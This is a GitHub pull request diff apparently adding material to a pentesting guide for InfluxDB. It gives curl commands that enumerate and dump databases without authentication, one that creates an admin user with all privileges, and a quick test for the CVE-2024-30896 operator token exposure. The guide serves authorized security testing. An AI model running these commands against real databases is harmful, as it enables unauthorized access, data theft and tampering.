Skip to content

Research Update Enhanced src/network-services-pentesting/808... #1526

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 2 commits into from
Nov 7, 2025
Merged

Research Update Enhanced src/network-services-pentesting/808... #1526

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
cc03cbf
Add content from: Research Update: Enhanced src/network-services-pent…
Oct 27, 2025
a2ebf93
Update 8086-pentesting-influxdb.md
carlospolop Nov 7, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
117 changes: 110 additions & 7 deletions src/network-services-pentesting/8086-pentesting-influxdb.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,21 @@ PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
```

## Identify & Version (HTTP)

- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`.
- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.

```bash
# v1 banner grab
curl -i http://<host>:8086/ping

# v2/compat health
curl -s http://<host>:8086/health | jq .
```

Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`.

## Enumeration

From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info.
Expand All @@ -22,8 +37,8 @@ From a pentester point of view this another database that could be storing sensi
InfluxDB might require authentication or not

```bash
# Try unauthenticated
influx -host 'host name' -port 'port #'
# Try unauthenticated CLI (v1 shell)
influx -host <host> -port 8086
> use _internal
```

Expand All @@ -35,9 +50,50 @@ influx –username influx –password influx_pass

There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)

### Manual Enumeration
### Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

```bash
# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).
# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
--data-urlencode "epoch=ns" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
```

> [!WARNING]
> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`

If authentication is disabled, you can even create users and escalate:

```bash
# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
--data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
```

The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).

#### Show databases

Expand Down Expand Up @@ -109,13 +165,60 @@ time cpu host usage_guest usage_guest_nice usage_idle
1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101
```

> [!WARNING]
> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`
### InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

```bash
# Basic org, bucket, and auth discovery
TOKEN="<token>"; H="-H Authorization: Token $TOKEN"

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s $H http://<host>:8086/api/v2/organizations | jq .

# List buckets
curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux
curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
-X POST http://<host>:8086/api/v2/query \
--data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
```

Notes
- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
- In v2, the HTTP `Authorization` header must be in the form `Token <value>`.

### Automated Authentication
### Automated Enumeration

```bash
msf6 > use auxiliary/scanner/http/influxdb_enum
```

### Recent vulns and privesc of interest (last years)

- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:

```bash
# Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
# Look for entries of type "operator" and extract the raw token (if present)
```

- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.



## References

- InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`). <https://docs.influxdata.com/influxdb/v1/tools/api/>
- CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x. <https://www.wiz.io/vulnerability-database/cve/cve-2024-30896>
{{#include ../banners/hacktricks-training.md}}